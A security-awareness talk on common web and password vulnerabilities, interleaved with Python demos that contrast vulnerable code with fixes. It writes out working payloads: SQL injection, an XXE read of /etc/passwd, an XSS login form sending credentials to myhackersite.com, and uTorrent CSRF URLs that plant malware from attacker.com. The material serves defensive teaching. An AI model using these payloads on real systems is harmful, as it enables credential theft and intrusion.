Secure Software:
Action, Comedy or Drama?
(Edition 2017)
Peter Sabev, p.sabev@fastlanesoft.com
Who is that man?
Giotto
(1266-1337)
Italian painter and
architect
The Mourning of Christ (1306) in Cappella degli Scrovegni
Pope Benedict XI looking for masters…
Creating perfect circles and perfect software is hard!
Intended vs. Implemented
Intended functionality vs. software as coded: the gap between them is missing or incorrect functionality
Side-effect: most security bugs are here!
I’ll talk about the side effects today…
Sometimes bugs are
found accidentally…
•Logged on to his father's Xbox
•Without knowing the password
•Bug: leading spaces in the password field were accepted
Sometimes attacks are on purpose…
2011 Sony PlayStation Network Outage
•23-day outage of the PlayStation Network for all PS3 and PSP consoles
•77 000 000 user accounts exposed
•Over 12 000 credit card numbers stolen
•Outage costs were officially $171 000 000
Some Facts and Numbers
97% of Java apps scanned in 2015 had code quality errors
95% of mobile apps were vulnerable
90% of web apps have security vulnerabilities
87% of PHP applications had vulnerable security functions
43% of developers released apps with known vulnerabilities
39% increase in vulnerabilities in the last 5 years
10% of applications still have hard-coded passwords
Sources: Vulnerability Review 2016-2017, Flexera Software; HPE Cyber Risk Report 2016; 2015 Trustwave Global Security Report; World Quality Report 2015-2016,
Capgemini; The Impact of Security on Development, Prevoty
OWASP Top 10
Vulnerabilities 2017-RC2
CWE/SANS Top 25
Most Dangerous Software Errors
The most important vulnerabilities
combined into 5 titles:
1. Insecure Interface
2. Insufficient Authentication
3. Security Misconfiguration
4. Lack of Transport Encryption
5. Privacy Concerns
1. Insecure Interface
• Injection (SQLi) and XML External Entities (XXE)
• Cross-Site Scripting (XSS)
• Cross-Site Request Forgery
(CSRF)
THIS TALK SHOWS SOME TECHNIQUES FOR DEVELOPING BETTER
SOFTWARE SECURITY AND HACKER DEFENSE ATTITUDE.
YOU MAY USE THESE TECHNIQUES ON COMPUTERS, WEBSITES, SYSTEMS
AND SOFTWARE THAT YOU OWN.
PERFORMING HACK ATTEMPTS WITHOUT PERMISSION ON COMPUTERS
THAT YOU DO NOT OWN IS ILLEGAL.
SQL Injection explained in 3 steps:
1. Imagine the following piece of code:
String sqlQuery = "SELECT * FROM user WHERE name = '" + username + "' AND pass='" + password + "'";
2. Setting username to Peter & password to ' OR '1'='1 produces:
SELECT * FROM user WHERE name = 'Peter' AND pass='' OR '1'='1'
3. '1'='1' is always true, so Peter is logged in without a password.
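The same three steps as an added example (not code from the slides): the Java concatenation above ported to Python on SQLite, beside the parameterized query that defeats the payload. Table and column names follow the slide; the single user row is constructed test data, stored in plaintext only to keep the injection demo minimal (the deck's password slides cover hashing).

```python
import sqlite3

# Added example, not code from the slides. Table/column names follow the
# slide; the user row is constructed data.

PAYLOAD = "' OR '1'='1"   # the password value used on the slide


def make_db() -> sqlite3.Connection:
    """In-memory database with a single constructed user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, pass TEXT)")
    conn.execute("INSERT INTO user VALUES ('Peter', 'correct horse')")
    return conn


def injected_statement(username: str, password: str) -> str:
    """Step 1 and 2 from the slide: the statement the database actually
    receives once the values are glued into the SQL text."""
    return ("SELECT * FROM user WHERE name = '" + username
            + "' AND pass='" + password + "'")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: the quote in the password closes the literal,
    the rest becomes SQL, and the OR makes the WHERE clause match every row."""
    return conn.execute(injected_statement(username, password)).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized query: the SQL text is fixed and the values travel
    separately, so the same payload is compared as a literal string."""
    sql = "SELECT * FROM user WHERE name = ? AND pass = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print(injected_statement("Peter", PAYLOAD))
    print("vulnerable, injected payload:", login_vulnerable(db, "Peter", PAYLOAD))    # True
    print("vulnerable, unknown user:    ", login_vulnerable(db, "nobody", PAYLOAD))   # True
    print("safe, injected payload:      ", login_safe(db, "Peter", PAYLOAD))          # False
    print("safe, real password:         ", login_safe(db, "Peter", "correct horse"))  # True
```

Note the second vulnerable call: the attacker does not even need a valid username, because the OR short-circuits the whole WHERE clause.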
The Comedy Part
Injection does not need to be SQL…
It does not need to be front-end either…
It can even be hidden inside an image file: ImageMagick (ImageTragick, 2016)
Problem:
• Checked the MIME type only, so a crafted file declared as an image still reached the image processor
• Fixed 8+ times until fully resolved (05/2016)
• ImageMagick vulnerabilities up to now: 403 (11/2017)
• https://imagetragick.com/
Popular vulnerability in 2017:
XML External Entity (XXE) Processing
1. Application parses XML documents.
2. The XML processor is configured to validate and process/resolve the document type declaration (DTD):
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd"
>]><foo>&xxe;</foo>
3. The parser replaces &xxe; with the contents of /etc/passwd, which end up in the application's response.
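The three steps run end to end, as an added example in Python (not code from the slides): the payload above is reproduced with file:///etc/passwd swapped for a constructed temp file with fake content, so it runs anywhere, and then parsed once with external entity resolution switched on (the vulnerable configuration) and once with a hardened parser. It assumes Python 3.7.1 or later, where xml.sax stops resolving external general entities by default.

```python
import io
import tempfile
import xml.etree.ElementTree as ET
import xml.sax
import xml.sax.handler
from pathlib import Path

# Added example, not code from the slides. FAKE_PASSWD is constructed; the
# temp file stands in for /etc/passwd so the demo is harmless and portable.

FAKE_PASSWD = "root:x:0:0:root:/root:/bin/bash"


def build_payload() -> bytes:
    """The XXE document from the slide, pointing at a file we just created."""
    target = Path(tempfile.mkdtemp()) / "passwd"
    target.write_text(FAKE_PASSWD)
    doc = (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        '<!DOCTYPE foo [\n'
        '<!ELEMENT foo ANY >\n'
        f'<!ENTITY xxe SYSTEM "{target.as_uri()}"\n'
        '>]><foo>&xxe;</foo>'
    )
    return doc.encode("latin-1")


class TextCollector(xml.sax.handler.ContentHandler):
    """Gathers the character data the parser hands back (the 'response')."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def parse_with_sax(doc: bytes, resolve_external_entities: bool) -> str:
    """Step 2 from the slide: the processor is told whether to resolve
    external general entities. True reproduces the vulnerable configuration;
    False is the xml.sax default since Python 3.7.1."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(doc))
    return "".join(collector.chunks)


def parse_untrusted(doc: bytes) -> str:
    """Hardened parse for untrusted XML: refuse any DOCTYPE outright (no entity
    declarations means no XXE and no billion-laughs expansion), then use
    ElementTree, which never resolves external entities anyway."""
    if b"<!doctype" in doc[:4096].lower():
        raise ValueError("DOCTYPE is not allowed in untrusted XML")
    return ET.fromstring(doc).text or ""


def is_rejected(doc: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted(doc)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    payload = build_payload()
    print("resolving parser leaks:", parse_with_sax(payload, True))         # the fake passwd line
    print("non-resolving parser:  ", repr(parse_with_sax(payload, False)))  # ''
    print("hardened parser rejects payload:", is_rejected(payload))         # True
    print("hardened parser on clean doc:", parse_untrusted(b"<foo>hi</foo>"))
```

Rejecting the DOCTYPE is the blunt rule OWASP recommends for input you do not control; if a schema genuinely needs a DTD, disable external entities and external DTD loading in the parser instead, which is what the False branch above does.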
2. Cross Site Scripting (XSS) explained
Put the following code in a search field, edit box or another text component:
<script>alert('XSS')</script>
Funny image or banner ad?
<img src="https://i.ytimg.com/vi/0vxCFIGCqnI/maxresdefault.jpg" width="80%">
Entire login form that tricks the user?
This video is Hilarious..... worth every second'<br><br>To see the search results, please login with the form below before proceeding:<form action="http://myhackersite.com/destination.php"><table><tr><td>Login:</td><td><input type=text length=20 name=login></td></tr><tr><td>Password:</td><td><input type=text length=20 name=password></td></tr></table><input type=submit value=LOGIN></form><br/><br/><br/><br/><br/><br/>
The link to distribute is a little bit long…
http://testasp.vulnweb.com/Search.asp?tfSearch=This%20video%20is%20Hilarious.....%20worth%20every%20second%27%3Cbr%3E%3Cbr%3ETo%20see%20the%20search%20results%2C%20please%20login%20with%20the%20form%20below%20before%20proceeding%3A%3Cform%20action%3D%22http%3A%2F%2Fmyhackersite.com%2Fdestination.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dtext%20length%3D20%20name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dtext%20length%3D20%20name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput%20type%3Dsubmit%20value%3DLOGIN%3E%3C%2Fform%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E
But that is what
URL shortening services are for…
Here is your phishing URL:
http://bit.ly/25zaEyy
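What the server does with that link, as an added example in Python (not code from the slides or from the demo site): the phishing URL above is decoded exactly as the search page sees it and rendered twice, once pasted raw into the page (the bug) and once HTML-encoded (the fix). The three payloads are the slides' own; testasp.vulnweb.com is the deck's demo target, nothing is sent to it.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Added example, not code from the slides. The URL is the deck's phishing
# link; the render functions are a stand-in for the search page.

PHISHING_URL = (
    "http://testasp.vulnweb.com/Search.asp?tfSearch="
    "This%20video%20is%20Hilarious.....%20worth%20every%20second%27%3Cbr%3E%3Cbr%3E"
    "To%20see%20the%20search%20results%2C%20please%20login%20with%20the%20form%20below"
    "%20before%20proceeding%3A%3Cform%20action%3D%22http%3A%2F%2Fmyhackersite.com%2F"
    "destination.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput"
    "%20type%3Dtext%20length%3D20%20name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E"
    "Password%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%3Dtext%20length%3D20%20name%3Dpassword"
    "%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput%20type%3Dsubmit%20value%3DLOGIN%3E"
    "%3C%2Fform%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E%3Cbr%2F%3E"
)

SLIDE_PAYLOADS = [
    "<script>alert('XSS')</script>",
    '<img src="https://i.ytimg.com/vi/0vxCFIGCqnI/maxresdefault.jpg" width="80%">',
]


def reflected_term(url: str) -> str:
    """The search term exactly as the server sees it after URL decoding."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("tfSearch", [""])[0]


def render_vulnerable(term: str) -> str:
    """What the vulnerable page does: the term is pasted into the HTML."""
    return f"<h2>Search results for: {term}</h2>"


def render_safe(term: str) -> str:
    """Output encoding for an HTML text context: <, >, &, and both quote
    characters become entities, so the browser displays the payload as text
    instead of building a form or running a script."""
    return f"<h2>Search results for: {html.escape(term, quote=True)}</h2>"


def has_injected_tags(page: str) -> bool:
    """Did the user-controlled part of the page turn into live markup?"""
    body = page.lower()
    return any(tag in body for tag in ("<script", "<img", "<form", "<input"))


if __name__ == "__main__":
    term = reflected_term(PHISHING_URL)
    print(term[:80] + "...")
    print("raw echo creates markup:  ", has_injected_tags(render_vulnerable(term)))  # True
    print("encoded echo is inert:    ", has_injected_tags(render_safe(term)))        # False
```

Encoding must match the context: html.escape is right for text between tags and for quoted attributes, but a value dropped into a JavaScript string or a URL needs the encoding for that context, and a Content-Security-Policy header limits the damage when one spot is missed.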
The Drama Part
3. Cross-Site Request Forgery (CSRF)
causes a user's web browser to perform an unwanted action on a
trusted site for which the user is currently authenticated.
3 Easy Steps for uTorrent CSRF Exploit (2008)
1. Turn on the “Move completed downloads” option:
http://localhost:14774/gui/?action=setsetting&s=dir_completed_download_flag&v=
2. Change the path for completed downloads to the Windows startup folder:
http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:\Documents%20and%20Settings\All%20Users\Start%20Menu\Programs\Startup
3. Get the victim to add a torrent containing a .bat file and the malware, which then lands in the Startup folder:
http://localhost:14774/gui/?action=add-url&s=http://www.attacker.com/file.torrent
All three are plain GET requests to the web UI on localhost, so an <img> or <script> tag on any page the victim visits is enough to send them with the victim's own credentials.
The Action Part (XSS&CSRF)
X-Frame-Options: DENY (the site cannot be framed, which stops clickjacking)
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block (legacy browser filter; current browsers have removed it, so a Content-Security-Policy header has to do that job)
Regenerate the session ID (cookie) after login.
Check the IP address (or even bind it into the session cookie); users on mobile networks or behind NAT change addresses, so treat a mismatch as a signal rather than proof.
1. Trust no user input. Never. Ever!
2. Validate input and process only 100% trustworthy data; encode output for the context it lands in (HTML, attribute, JavaScript, URL).
3. Use parameterized queries and stored procedures (a stored procedure that builds dynamic SQL from its arguments is still injectable).
4. Test! There are many scanners for SQLi, XSS, CSRF, etc.
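The session and CSRF points above, as an added example in Python (not code from the slides or from uTorrent): a minimal in-memory session store that issues a per-session CSRF token, refuses state changes over GET, regenerates the session ID at login, and sends the headers from the slide. SESSIONS, EXPLOIT_URL and the Content-Security-Policy value (my substitute for the retired X-XSS-Protection header) are assumptions made for the demo.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Added example, not code from the slides or uTorrent. Everything below is a
# constructed stand-in for a real web application's session layer.

SESSIONS: Dict[str, dict] = {}              # session_id -> {"user": ..., "csrf": ...}
STATE_CHANGING = {"setsetting", "add-url"}  # the actions the 2008 exploit used

SECURITY_HEADERS = {
    "X-Frame-Options": "DENY",              # cannot be framed (clickjacking)
    "X-Content-Type-Options": "nosniff",    # no MIME sniffing of responses
    # X-XSS-Protection is ignored by current browsers; a CSP does the real work
    "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
}

# the slide's step 2, with the backslashes percent-encoded for the URL
EXPLOIT_URL = ("http://localhost:14774/gui/?action=setsetting&s=dir_completed_download"
               "&v=C:%5CDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup")


def login(user: str, old_session_id: Optional[str] = None) -> str:
    """Regenerate the session at login: whatever ID the browser carried before
    (possibly planted by an attacker, i.e. session fixation) is discarded and
    a fresh ID plus a fresh CSRF token are issued."""
    SESSIONS.pop(old_session_id, None)
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return session_id


def csrf_token(session_id: str) -> str:
    """The token the real UI embeds in its own forms. A third-party page can
    make the browser send the cookie, but it cannot read this value."""
    return SESSIONS[session_id]["csrf"]


def handle(method: str, url: str, cookie_session: Optional[str],
           form: Dict[str, str]) -> Tuple[int, str, dict]:
    """Router for /gui/?action=... Returns (status, message, response headers)."""
    if cookie_session not in SESSIONS:
        return 401, "no valid session", SECURITY_HEADERS
    action = parse_qs(urlsplit(url).query).get("action", [""])[0]
    if action in STATE_CHANGING:
        if method != "POST":
            # the 2008 exploit was three GETs; refusing GET kills it outright
            return 405, "state change over GET refused", SECURITY_HEADERS
        sent = form.get("csrf", "").encode()
        expected = SESSIONS[cookie_session]["csrf"].encode()
        if not hmac.compare_digest(sent, expected):
            return 403, "missing or wrong CSRF token", SECURITY_HEADERS
        return 200, f"{action} applied", SECURITY_HEADERS
    return 200, "ok", SECURITY_HEADERS


if __name__ == "__main__":
    sid = login("peter", old_session_id="planted-by-attacker")
    print(handle("GET", EXPLOIT_URL, sid, {})[:2])                          # (405, ...)
    print(handle("POST", EXPLOIT_URL, sid, {})[:2])                         # (403, ...)
    print(handle("POST", EXPLOIT_URL, sid, {"csrf": csrf_token(sid)})[:2])  # (200, ...)
```

Marking the session cookie SameSite=Lax (the default in current Chrome) adds a second, browser-side layer: cross-site POSTs then do not carry the cookie at all, but the token check still matters for older clients and for same-site subdomains you do not control.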
The Action Part (Summary)
Penetration Testing Tools
OWASP ZAP (Zed Attack Proxy)
Nikto
Nmap
Acunetix
Bishop Vulnerability Scanner (Chrome Plugin)
Firebug (Firefox plugin)
HP Scrawlr & HP Webinspect
Havij Pro
Sqlmap
The Comedy Part
Which is the most popular password?
Top of the list: 123456, password, 12345678, qwerty
Full list: http://www.passwordrandom.com/most-popular-passwords
The Drama Part
Dictionary Attacks (Nessus + Hydra)
• 9.8% have the passwords password, 123456 or 12345678;
• 14% have a password from the top 10 passwords
• 40% have a password from the top 100 passwords
• 79% have a password from the top 500 passwords
• 91% have a password from the top 1 000 passwords
• 98.8% have a password from the top 10 000 passwords
1. Limit login attempts.
2. Add password length and
character requirements.
The Action Part
… and the “big difference”:
The 3 most popular passwords now hold “only” 1.2% of all passwords:
•Password1
•Hello123
•Welcome1
All three satisfy the usual “one upper-case letter and one digit” rule, which is the point: complexity rules shape the guesses rather than prevent them.
Source: Trustwave
1. Limit login attempts.
2. Add password length and
character requirements.
3. Password hashing (not encryption)
The Action Part
The Worst Option: Plaintext Password
<server>
<id>my.server</id>
<username>admin</username>
<password>Welcome1</password>
</server>
Still Bad Option: Shift ASCII Code or Similar*
<server>
<id>my.server</id>
<username>admin</username>
<password>Zhofrph4</password>
</server>
* There was a hot dispute in developer’s forum whether shift
by 5 or shift by 12 is better
Better Option: Use MD5 hash (with salt!!!)
<server>
<id>my.server</id>
<username>admin</username>
<password>{b56e0b4ea4962283bee762525c2d490f}</password>
</server>
(Better than the options above, but MD5 is fast: even salted, it falls to a dictionary attack at billions of guesses per second, and without a salt one precomputed table cracks every user at once.)
Even better option - Bcrypt
<server>
<id>my.server</id>
<username>admin</username>
<password>{$2a$08$zr8EtKWwENQBAztAp3o0FO5Tbc69RuJrm6GvPhJKOZr/PNkaZKxE2}</password>
</server>
(The $08$ is the cost factor; 10 or higher is the usual minimum today. scrypt and Argon2 are the other accepted choices.)
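The whole ladder, plus the dictionary-attack slide, as an added example in Python (not code from the slides): the "shift" scheme is undone by brute force, an unsalted fast hash falls to a word list, and a salted slow hash survives. The word list is a constructed excerpt of the top passwords quoted in the deck; bcrypt is not in the Python standard library, so PBKDF2-HMAC-SHA256 stands in for it (same idea: per-user salt plus a tunable cost).

```python
import hashlib
import hmac
import os
import string
from typing import List, Optional

# Added example, not code from the slides. TOP_PASSWORDS is a constructed
# excerpt; PBKDF2 replaces the slide's bcrypt because it is in the stdlib.

TOP_PASSWORDS = ["123456", "password", "12345678", "qwerty",
                 "Password1", "Hello123", "Welcome1"]


def caesar(text: str, shift: int) -> str:
    """The 'shift ASCII code' scheme: letters and digits rotate in place.
    The slide's Welcome1 -> Zhofrph4 is this with shift 3."""
    out = []
    for ch in text:
        for alphabet in (string.ascii_uppercase, string.ascii_lowercase, string.digits):
            if ch in alphabet:
                out.append(alphabet[(alphabet.index(ch) + shift) % len(alphabet)])
                break
        else:
            out.append(ch)
    return "".join(out)


def unshift_candidates(obscured: str) -> List[str]:
    """The attacker does not care whether the shift was 5 or 12: 26 tries."""
    return [caesar(obscured, -s) for s in range(26)]


def md5_unsalted(password: str) -> str:
    return hashlib.md5(password.encode()).hexdigest()


def crack_unsalted(target_hex: str, wordlist: List[str]) -> Optional[str]:
    """Dictionary attack: one cheap hash per guess, and because there is no
    salt the same table of hashes cracks every account at once."""
    for word in wordlist:
        if md5_unsalted(word) == target_hex:
            return word
    return None


def hash_password(password: str, iterations: int = 200_000) -> str:
    """Salted, slow hash. A fresh 16-byte salt makes each stored value unique
    (no shared lookup table); the iteration count is the cost factor that
    makes every guess expensive, the job bcrypt's $08$ does on the slide."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and cost; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print(caesar("Welcome1", 3))                                     # Zhofrph4
    print("Welcome1" in unshift_candidates("Zhofrph4"))              # True
    print(crack_unsalted(md5_unsalted("Welcome1"), TOP_PASSWORDS))   # Welcome1
    stored = hash_password("Welcome1")
    print(verify_password("Welcome1", stored), verify_password("Welcome2", stored))  # True False
```

Two hashes of the same password differ because of the salt, which is exactly what defeats the shared table that cracks the MD5 column; the slow hash does not stop a guess at "Welcome1" itself, which is why the length and lockout rules in this list still matter.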
1. Limit login attempts.
2. Add password length and
character requirements.
3. Password hashing (not encryption)
4. Password recovery
The Action Part
Think about password recovery: reset tokens must be random, single-use and short-lived, and the flow must not reveal whether an account exists.
1. Limit login attempts.
2. Add password length and
character requirements.
3. Password hashing (not encryption)
4. Password recovery
5. Protect against non-human
intervention (captcha)
The Action Part
Hackers are creative…
The Real Drama Part
Slack’s DB got stolen and hacked (05’2015)
LinkedIn got hacked (2012)
•164 million accounts stolen
•Account info now sold on the black market
•Check haveibeenpwned.com for your account
•There are concerns even about the current fixes
The Problem: One-Factor Authentication
Something that you know
Two-Factor Authentication:
Something that you know + Something that you have
Three-Factor Authentication: Something that you know
+ Something that you have + Something that you are
Use two or three factor
authentication
(at least for important stuff)
The Real Action Part
Distributed Denial of Service (DDoS)
• Unintentional: a TV show sends 10 000s of people to your site at once
• Early days: ICQ
• Nowadays: malware
Topology: real attacker → master → daemons (infected machines) → victim
1. Invest in hardware
The Action Part
Worse than DDoS: Ransomware
•Biggest problem of
2016 and 2017
•Usually encrypts the
files so they become
unusable
•Wants money to be paid (usually in Bitcoin, which is hard to trace to a person)
1. Invest in hardware
2. Backup and Recovery Plans
The Action Part
1. Invest in hardware
2. Backup and Recovery Plans
3. Prevent flooding
The Action Part
Access Control
Removing any site from Google using URL manipulation?
•Exploit in Google Webmaster Tools
•Fixed within 7 hours
https://www.google.com/webmasters/tools/removals-request?hl=en&siteUrl=http://{YOUR_URL}/&urlt={URL_TO_BLOCK}
•The tool verified that you owned {YOUR_URL} but not that {URL_TO_BLOCK} belonged to it.
Source: http://www.jamesbreckenridge.co.uk/remove-any-site-from-google-even-if-you-dont-control-it.html
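The missing check, as an added example in Python (not Google's code, a reconstruction of what the endpoint above needed): the caller must own siteUrl, and urlt must lie inside that site, decided by parsing the URL rather than by string prefix. `verified_sites` is a constructed set of sites the logged-in user has proven ownership of; the example domains are placeholders.

```python
from typing import Set
from urllib.parse import SplitResult, urlsplit

# Added example, not Google's code. A reconstruction of the authorization
# check the removal tool was missing; all URLs below are constructed.

DEFAULT_PORTS = {"http": 80, "https": 443}


def port_of(u: SplitResult) -> int:
    """Explicit port, or the scheme's default so :80 and no port compare equal."""
    return u.port or DEFAULT_PORTS.get(u.scheme.lower(), 0)


def same_site(owned: str, target: str) -> bool:
    """True only if target shares scheme, host and port with the owned site
    and its path sits under the owned path. Parsing, not prefix matching,
    is what rejects http://mysite.example.evil.example and
    http://mysite.example@evil.example (the host there is evil.example)."""
    o, t = urlsplit(owned), urlsplit(target)
    if t.scheme.lower() != o.scheme.lower():
        return False
    if not o.hostname or not t.hostname or o.hostname.lower() != t.hostname.lower():
        return False
    if port_of(o) != port_of(t):
        return False
    owned_path = o.path or "/"
    prefix = owned_path if owned_path.endswith("/") else owned_path + "/"
    return t.path == owned_path.rstrip("/") or t.path.startswith(prefix)


def authorize_removal(verified_sites: Set[str], site_url: str, url_to_block: str) -> bool:
    """Both checks the vulnerable endpoint needed: the caller owns siteUrl,
    and urlt is inside it. Either failing means the request is refused."""
    return site_url in verified_sites and same_site(site_url, url_to_block)


if __name__ == "__main__":
    mine = {"http://mysite.example/"}
    print(authorize_removal(mine, "http://mysite.example/", "http://mysite.example/old-page"))  # True
    print(authorize_removal(mine, "http://mysite.example/", "http://competitor.example/"))     # False
    print(authorize_removal(mine, "http://competitor.example/", "http://competitor.example/")) # False
```

The general lesson is that every object reference a request carries (here, the URL to block) needs its own ownership check; verifying the caller's identity or one of the parameters is not enough.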
1. Invest in hardware
2. Backup and Recovery Plans
3. Prevent flooding
4. Use Access Control Lists
5. Secure configuration, Logging
and Monitoring
The Action Part
Google is not Google?
(2012, Brazil)
•Biggest ISP in Brazil
•Firmware vulnerability
•4.5 million routers
•Malicious DNS servers
•Fake Google.com,
Facebook.com,
Yahoo.com and others
install malware
6. Minimum open ports and
running services
The Action Part
There is no escape sometimes!
Chart: Most Vulnerable Products 2017, known vulnerabilities per year by OS over the last 10 years (2005 to 2015; Windows, MacOS, Ubuntu incl. kernel, Debian incl. kernel; y-axis 0 to 700)
Source: Vulnerability Review 2017, Flexera Software
6. Minimum open ports and
running services
7. Frequent update of firmware and
software
8. Secure updates – verify the download against a signature (or a checksum fetched over a separate trusted channel) to avoid installing a fake update
The Action Part
Example 1: Wi-Fi Sniper
Example 2: Baby monitor
•IoT can be dangerous
•Wi-Fi sniffing is possible
•Strangers near your house?
Example 3:
Tetris on Building
6. Minimum open ports and
running services, use firewall
7. Frequent update of firmware and
software
8. Secure updates – verify the download against a signature (or a checksum fetched over a separate trusted channel) to avoid installing a fake update
9. Improve physical security
The Action Part
The Comedy Part
A Story of How I Won an Online Game
Non-Encrypted POST query:
When I finished the game, the following HTTP POST query was sent:
POST /path/script.cgi HTTP/1.0
From: game@*site*.com
User-Agent: HTTPTool/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

name=Peter&surname=Sabev&score=10
My “next game” was with the following POST query:
POST /path/script.cgi HTTP/1.0
From: game@*site*.com
User-Agent: HTTPTool/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

name=Peter&surname=Sabev&score=32767
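The server side of that story, as an added example in Python (not the game's code or the slides'): both requests are embedded as captured above (the redacted e-mail domain is kept as shown), parsed strictly, and checked against a score the server computed itself from events it validated. The point is that encryption would not have helped: over HTTPS the client can still send any number it likes, so the `score` field must be checked rather than believed. `ScoreServer` and the per-event limit are assumptions for the demo.

```python
from typing import Dict, Tuple
from urllib.parse import parse_qs

# Added example, not the game's code. The two requests are the ones shown
# above; ScoreServer is a constructed stand-in for the real script.cgi.

POST_HONEST = (
    b"POST /path/script.cgi HTTP/1.0\r\n"
    b"From: game@*site*.com\r\n"
    b"User-Agent: HTTPTool/1.0\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 33\r\n"
    b"\r\n"
    b"name=Peter&surname=Sabev&score=10"
)
POST_TAMPERED = (POST_HONEST
                 .replace(b"Content-Length: 33", b"Content-Length: 36")
                 .replace(b"score=10", b"score=32767"))


def parse_request(raw: bytes) -> Dict[str, object]:
    """Strict parse of a captured HTTP/1.0 request: Content-Length must
    match the body actually received and the form must be well-formed."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header/body separator")
    request_line, *header_lines = head.decode("ascii").split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    if int(headers.get("content-length", "-1")) != len(body):
        raise ValueError("Content-Length does not match body")
    pairs = parse_qs(body.decode("ascii"), strict_parsing=True)
    return {"request_line": request_line, "headers": headers,
            "form": {k: v[0] for k, v in pairs.items()}}


def is_well_formed(raw: bytes) -> bool:
    try:
        parse_request(raw)
        return True
    except ValueError:
        return False


class ScoreServer:
    """The server is the authority: points are awarded from events it has
    validated itself, so the final POST cannot raise the score."""
    MAX_POINTS_PER_EVENT = 10

    def __init__(self):
        self.games: Dict[str, int] = {}

    def start(self, player: str) -> None:
        self.games[player] = 0

    def record_event(self, player: str, points: int) -> None:
        if player not in self.games:
            raise KeyError("no game in progress")
        if not 0 < points <= self.MAX_POINTS_PER_EVENT:
            raise ValueError("impossible points for one event")
        self.games[player] += points

    def submit(self, raw: bytes) -> Tuple[str, int]:
        """('accepted', score) when the claim matches the server's tally,
        otherwise ('rejected', claimed score)."""
        form = parse_request(raw)["form"]
        player = f"{form['name']} {form['surname']}"
        claimed = int(form["score"])
        actual = self.games.get(player)
        if actual is None or claimed != actual:
            return "rejected", claimed
        return "accepted", actual


if __name__ == "__main__":
    server = ScoreServer()
    server.start("Peter Sabev")
    server.record_event("Peter Sabev", 10)
    print(server.submit(POST_HONEST))    # ('accepted', 10)
    print(server.submit(POST_TAMPERED))  # ('rejected', 32767)
```

In a real game the events themselves would also be rate-limited and sanity-checked against elapsed time, since a client that can forge a score can forge events just as easily; the design principle is the same: the server keeps the state, the client only reports.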
The Drama Part
Remotely Controlled Car
Jeep Cherokee remotely controlled
•Uconnect radio breach
•The attacker can control the car remotely
•Only the car's IP address was needed
•Chrysler recalled 1 400 000 vehicles
Plane hacked mid-air (05’2015)
•Just using laptop and LAN
cable
•Entertainment System
connected to the Cabin
Control System
•Default credentials
•Caused plane to climb in
simulated flight
The Action Part
Use recommended, accepted and up-to-date implementations, and follow best practices for encryption and authentication.
The Action Part
Compare left and right…
Facebook.com
Google.com
Yahoo.com
Booking.com
The letters in red in the right-hand copies are Cyrillic (IDN homograph attack): the two columns look identical on screen, but the right-hand names are different domains.
Obtain an EV certificate & use 2FA
(Since 2019 the major browsers no longer show the EV company name in the address bar, so an EV certificate by itself no longer helps users spot a look-alike; 2FA and a password manager, which will not fill credentials on the wrong domain, still do.)
The issue was resolved for browsers in April 2017, but it is still a problem for emails and links in social networks.
